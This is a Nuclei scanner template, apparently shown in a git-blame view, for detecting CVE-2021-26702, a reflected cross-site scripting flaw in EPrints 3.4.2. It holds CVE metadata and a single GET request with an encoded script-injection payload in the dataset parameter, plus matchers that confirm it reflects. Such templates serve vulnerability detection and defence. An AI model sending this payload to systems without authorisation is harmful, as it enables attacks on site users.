2022-07-05 17:36:53 +00:00
|
|
|
id: CVE-2021-26702
|
|
|
|
|
|
|
|
info:
|
2022-08-29 13:55:23 +00:00
|
|
|
name: EPrints 3.4.2 - Cross-Site Scripting
|
2022-07-05 17:36:53 +00:00
|
|
|
author: ritikchaddha
|
|
|
|
severity: medium
|
2022-08-29 13:55:23 +00:00
|
|
|
description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
|
2022-07-05 17:36:53 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
|
|
|
|
- https://files.eprints.org/2548/
|
2022-08-29 13:55:23 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-26702
|
2022-07-09 07:05:41 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2021-26702
|
|
|
|
cwe-id: CWE-79
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.00175
|
2023-11-03 10:59:12 +00:00
|
|
|
epss-percentile: 0.54584
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: eprints
|
|
|
|
product: eprints
|
|
|
|
tags: cve,cve2021,xss,eprints
|
2022-07-05 17:36:53 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-07-05 17:36:53 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-07-10 05:05:24 +00:00
|
|
|
- "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
2022-07-05 17:36:53 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2022-07-10 05:05:24 +00:00
|
|
|
- "</script><script>alert(document.domain)</script>"
|
2022-07-05 17:36:53 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-11-03 15:16:28 +00:00
|
|
|
# digest: 490a00463044022076ced1010198c9e3f54938bb1d7cf4ebcda5582f80bd4a776e09867102c9ac9b02201196e94e8ae4722c99a21b659d57f6f92b2c961067b90200fcaf9b38cb3b7d7b:922c64590222798bb761d5b6d8e72950
|